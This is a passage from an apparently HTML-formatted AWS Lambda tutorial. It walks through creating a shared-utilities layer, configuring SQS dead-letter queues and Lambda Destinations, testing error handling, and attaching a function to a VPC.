&lt;/span&gt;&lt;span class="n"&gt;log_level&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;LOG_LEVEL&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;INFO&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;stage&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;STAGE&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;dev&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Lambda encrypts all environment variables at rest by default using an AWS managed KMS key. For extra security, you can use a customer managed KMS key and decrypt in your code.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Part II
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Create a Lambda Layer
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Layers let you share code and libraries across multiple functions. Let's create one with a utility module.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Build and Upload a Layer&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;Layers must be uploaded as a zip file. &lt;br&gt;
We'll use &lt;strong&gt;AWS CloudShell:&lt;/strong&gt; a browser-based terminal built into the AWS Console so that you don't need anything installed locally.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 01:&lt;/strong&gt; Open &lt;strong&gt;CloudShell&lt;/strong&gt; by clicking the terminal icon (&lt;code&gt;&amp;gt;_&lt;/code&gt;) in the top navigation bar of the AWS Console next to the search bar&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 02:&lt;/strong&gt; Wait for it to initialize as it might take a few seconds the first time&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 03:&lt;/strong&gt;&lt;br&gt;
Run these commands:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="nb"&gt;mkdir&lt;/span&gt; &lt;span class="nt"&gt;-p&lt;/span&gt; python
&lt;span class="nb"&gt;cat&lt;/span&gt; &lt;span class="o"&gt;&amp;gt;&lt;/span&gt; python/utils.py &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="no"&gt;EOF&lt;/span&gt;&lt;span class="sh"&gt;'
"""
Shared utilities for Lambda functions.
This module is packaged as a Lambda Layer so multiple functions can use it.
"""
import json
import time
import random

def retry_with_backoff(func, max_retries=3, base_delay=0.5):
    """Retry with exponential backoff and jitter."""
    for attempt in range(max_retries + 1):
        try:
            return func()
        except Exception as e:
            if attempt == max_retries:
                raise
            delay = base_delay * (2 ** attempt)
            jitter = random.uniform(0, delay)
            time.sleep(delay + jitter)

def format_response(status_code, body):
    """Standard API Gateway response format."""
    return {
        'statusCode': status_code,
        'headers': {'Content-Type': 'application/json'},
        'body': json.dumps(body, default=str)
    }
&lt;/span&gt;&lt;span class="no"&gt;EOF

&lt;/span&gt;zip &lt;span class="nt"&gt;-r&lt;/span&gt; utils-layer.zip python/
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 04:&lt;/strong&gt; Download the zip&lt;br&gt;
Click &lt;strong&gt;Actions ▼&lt;/strong&gt; (top right of CloudShell) → &lt;strong&gt;Download file&lt;/strong&gt; → type &lt;code&gt;utils-layer.zip&lt;/code&gt; → click &lt;strong&gt;Download&lt;/strong&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Why the &lt;code&gt;python/&lt;/code&gt; folder?&lt;/strong&gt; Lambda layers must follow a specific directory structure. For Python, your code must be inside a &lt;code&gt;python/&lt;/code&gt; folder in the zip. Lambda adds this path to &lt;code&gt;sys.path&lt;/code&gt; automatically so your functions can &lt;code&gt;import utils&lt;/code&gt; directly.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 05:&lt;/strong&gt; Upload the Layer via Console&lt;br&gt;
In the Lambda console, click &lt;strong&gt;Layers&lt;/strong&gt; in the left sidebar&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 06:&lt;/strong&gt; Click &lt;strong&gt;Create layer&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Name:&lt;/strong&gt; &lt;code&gt;shared-utils&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Upload:&lt;/strong&gt; Choose the &lt;code&gt;utils-layer.zip&lt;/code&gt; file&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Compatible runtimes - &lt;em&gt;optional&lt;/em&gt;:&lt;/strong&gt; Python 3.12
Click &lt;strong&gt;Create&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Successfully created layer shared-utils version 1.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 07:&lt;/strong&gt; &lt;strong&gt;Attach the Layer to Your Function&lt;/strong&gt;&lt;br&gt;
Go back to the &lt;code&gt;DataProcessor&lt;/code&gt; function&lt;br&gt;
Scroll down to the &lt;strong&gt;Layers&lt;/strong&gt; section&lt;br&gt;
Click &lt;strong&gt;Edit&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 08:&lt;/strong&gt; &lt;strong&gt;Edit layers&lt;/strong&gt;&lt;br&gt;
Click &lt;strong&gt;Add a layer&lt;/strong&gt;&lt;br&gt;
Choose &lt;strong&gt;Custom layers&lt;/strong&gt;&lt;br&gt;
Select &lt;code&gt;shared-utils&lt;/code&gt;&lt;br&gt;
&lt;strong&gt;Version:&lt;/strong&gt; &lt;code&gt;1&lt;/code&gt;&lt;br&gt;
Click &lt;strong&gt;Add&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Successfully updated the function "DataProcessor".&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 09:&lt;/strong&gt; Now you can use it in your function code:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;utils&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;format_response&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;retry_with_backoff&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;lambda_handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nf"&gt;format_response&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;message&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Hello from DataProcessor&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;A function can have up to &lt;strong&gt;5 layers&lt;/strong&gt;. The total unzipped size of the function + all layers can't exceed &lt;strong&gt;250 MB&lt;/strong&gt;. Layers are versioned and immutable. Each upload creates a new version.&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Part III
&lt;/h2&gt;

&lt;h3&gt;
  
  
  &lt;strong&gt;Error Handling:&lt;/strong&gt; DLQ and Lambda Destinations
&lt;/h3&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Create a Dead Letter Queue&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Step 01:&lt;/strong&gt; Open the &lt;strong&gt;SQS&lt;/strong&gt; console&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 02:&lt;/strong&gt; Click &lt;strong&gt;Create queue&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Type:&lt;/strong&gt; Standard&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Name:&lt;/strong&gt; &lt;code&gt;data-processor-dlq&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Create queue&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Queue data-processor-dlq created successfully&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 03:&lt;/strong&gt; Copy the &lt;strong&gt;Queue ARN&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 04:&lt;/strong&gt; Create a Success Queue (for Destinations)&lt;br&gt;
Create another queue:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Name:&lt;/strong&gt; &lt;code&gt;data-processor-success&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Copy the &lt;strong&gt;Queue ARN&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 05:&lt;/strong&gt; &lt;strong&gt;Lambda&lt;/strong&gt; → DataProcessor → Configuration → Permissions → Click the &lt;strong&gt;Role name&lt;/strong&gt;&lt;br&gt;
&lt;strong&gt;Add permissions&lt;/strong&gt; → &lt;code&gt;Attach policies&lt;/code&gt;&lt;br&gt;
Search for &lt;code&gt;AmazonSQSFullAccess&lt;/code&gt; and attach it&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 06:&lt;/strong&gt; Configure the DLQ on the Lambda Function&lt;br&gt;
Go back to the &lt;code&gt;DataProcessor&lt;/code&gt; function&lt;br&gt;
&lt;strong&gt;Configuration&lt;/strong&gt; tab → &lt;strong&gt;Asynchronous invocation&lt;/strong&gt; → &lt;strong&gt;Edit&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Maximum age of event:&lt;/strong&gt; &lt;code&gt;1 h 0 min 0 sec&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Retry attempts:&lt;/strong&gt; &lt;code&gt;2&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Dead-letter queue service ▼:&lt;/strong&gt; Select &lt;code&gt;Amazon SQS&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Queue ▼:&lt;/strong&gt; Select &lt;code&gt;data-processor-dlq&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Successfully updated the function "DataProcessor".&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Destinations are the modern approach. They capture both success AND failure.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;strong&gt;Step 07:&lt;/strong&gt; Configure Lambda Destinations&lt;br&gt;
Still in &lt;strong&gt;Asynchronous invocation&lt;/strong&gt;, find the &lt;strong&gt;Destinations&lt;/strong&gt; section&lt;br&gt;
Click &lt;strong&gt;Add destination&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 08:&lt;/strong&gt; Add destination&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Source:&lt;/strong&gt; &lt;code&gt;Asynchronous invocation&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Condition:&lt;/strong&gt; &lt;code&gt;On success&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Destination type:&lt;/strong&gt; &lt;code&gt;SQS queue&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Destination:&lt;/strong&gt; &lt;code&gt;data-processor-success&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Your changes have been saved.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 09:&lt;/strong&gt; Click &lt;strong&gt;Add destination&lt;/strong&gt; again&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Source:&lt;/strong&gt; &lt;code&gt;Asynchronous invocation&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Condition:&lt;/strong&gt; &lt;code&gt;On failure&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Destination type:&lt;/strong&gt; &lt;code&gt;SQS queue&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Destination:&lt;/strong&gt; &lt;code&gt;data-processor-dlq&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;✅Green banner:&lt;/strong&gt; Your changes have been saved.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Lambda Destinations are preferred over DLQs because:&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Destinations capture &lt;strong&gt;both&lt;/strong&gt; success and failure (DLQ only captures failure)&lt;/li&gt;
&lt;li&gt;Destinations include more context (request payload, response, error details)&lt;/li&gt;
&lt;li&gt;Destinations work with async invocations only (same as DLQ)&lt;/li&gt;
&lt;li&gt;DLQs are still valid for SQS event source mappings&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;h4&gt;
  
  
  &lt;strong&gt;Test Error Handling&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Step 10:&lt;/strong&gt; Let's create a function that sometimes fails to see the error handling in action:&lt;/p&gt;

&lt;p&gt;Deploy this code, then test it&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;lambda_handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    This function randomly fails to demonstrate error handling.
    When invoked asynchronously:
    1. First attempt fails → Lambda retries
    2. Second attempt fails → Lambda retries again
    3. Third attempt fails → Event goes to DLQ / failure destination
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="n"&gt;action&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;action&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;process&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;action&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;fail&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# Always fail — will end up in DLQ after 3 attempts
&lt;/span&gt;        &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;Exception&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Simulated failure for testing DLQ&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;action&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;random&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
        &lt;span class="c1"&gt;# 50% chance of failure
&lt;/span&gt;        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;random&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;random&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mf"&gt;0.5&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
            &lt;span class="k"&gt;raise&lt;/span&gt; &lt;span class="nc"&gt;Exception&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="s"&gt;Random failure occurred&lt;/span&gt;&lt;span class="sh"&gt;"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;statusCode&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;body&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dumps&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;message&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Processed successfully&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;action&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;action&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;&lt;strong&gt;Step 11:&lt;/strong&gt; Click &lt;strong&gt;Test&lt;/strong&gt; tab&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 12:&lt;/strong&gt; &lt;strong&gt;Test event&lt;/strong&gt;&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;strong&gt;Test event action:&lt;/strong&gt; &lt;code&gt;Create new event&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Invocation type:&lt;/strong&gt; &lt;code&gt;Synchronous&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Event name:&lt;/strong&gt; &lt;code&gt;TestFailure&lt;/code&gt; &lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Even JSON:&lt;/strong&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight json"&gt;&lt;code&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="w"&gt;
  &lt;/span&gt;&lt;span class="nl"&gt;"action"&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;&lt;span class="w"&gt; &lt;/span&gt;&lt;span class="s2"&gt;"fail"&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="w"&gt;
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Click &lt;strong&gt;Test&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;❌ &lt;strong&gt;Executing function:&lt;/strong&gt; failed&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The function will fail. Since this is a synchronous test invocation, you'll see the error immediately. To test the DLQ flow, you need an &lt;strong&gt;asynchronous&lt;/strong&gt; invocation (from S3, SNS, or EventBridge).&lt;/p&gt;
&lt;/blockquote&gt;




&lt;h2&gt;
  
  
  Part IV
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Lambda with VPC Access
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;When Lambda needs to access private resources like RDS or ElastiCache, you attach it to a VPC. Let's walk through the configuration.&lt;/strong&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h4&gt;
  
  
  &lt;strong&gt;Understanding VPC Access&lt;/strong&gt;
&lt;/h4&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;Without VPC:
  Lambda → Internet → AWS Services (DynamoDB, S3, SQS)  ✅
  Lambda → Private RDS                                    ❌

With VPC:
  Lambda → VPC → Private RDS                              ✅
  Lambda → VPC → Internet                                 ❌ (no NAT)
  Lambda → VPC → NAT Gateway → Internet                   ✅
  Lambda → VPC → VPC Endpoint → AWS Services              ✅
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h4&gt;
  
  
  &lt;strong&gt;Configure VPC Access (Console Walkthrough)&lt;/strong&gt;
&lt;/h4&gt;

&lt;p&gt;&lt;strong&gt;Step 01:&lt;/strong&gt; Open the &lt;code&gt;DataProcessor&lt;/code&gt; function&lt;br&gt;
&lt;strong&gt;Configuration&lt;/strong&gt; tab → &lt;strong&gt;VPC&lt;/strong&gt; → &lt;strong&gt;Edit&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 02:&lt;/strong&gt; &lt;strong&gt;Edit VPC&lt;/strong&gt;&lt;br&gt;
Select the default VPC&lt;br&gt;
Select &lt;strong&gt;at least 2 private subnets&lt;/strong&gt; (for high availability)&lt;br&gt;
Select or create a &lt;strong&gt;security group&lt;/strong&gt; that allows outbound traffic&lt;/p&gt;

&lt;p&gt;Click &lt;strong&gt;Save&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;⚠️Important:&lt;/strong&gt; The Lambda execution role needs the &lt;code&gt;AWSLambdaVPCAccessExecutionRole&lt;/code&gt; managed policy.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Step 03:&lt;/strong&gt; Connection Reuse Pattern&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;When connecting to databases from Lambda, initialize the connection &lt;strong&gt;outside&lt;/strong&gt; the handler:&lt;br&gt;
&lt;/p&gt;


&lt;/blockquote&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;boto3&lt;/span&gt;

&lt;span class="c1"&gt;# This runs ONCE during cold start, then reuses across warm invocations
# This is critical for database connections — you don't want to open
# a new connection on every single invocation
&lt;/span&gt;&lt;span class="n"&gt;db_host&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;DB_HOST&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;db_name&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;os&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;environ&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;DB_NAME&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

&lt;span class="c1"&gt;# In a real app, you'd initialize your database connection here
# connection = pymysql.connect(host=db_host, ...)
&lt;/span&gt;
&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;lambda_handler&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;event&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;context&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
    &lt;span class="sh"&gt;"""&lt;/span&gt;&lt;span class="s"&gt;
    The handler runs on every invocation.
    The connection above is reused across warm invocations.
    &lt;/span&gt;&lt;span class="sh"&gt;"""&lt;/span&gt;
    &lt;span class="c1"&gt;# Use the connection...
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;statusCode&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
        &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;body&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;json&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;dumps&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;message&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;Connected to database&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;blockquote&gt;
&lt;p&gt;Always initialize SDK clients and database connections &lt;strong&gt;outside&lt;/strong&gt; the handler. This code runs once during the cold start and is reused for subsequent warm invocations. &lt;br&gt;
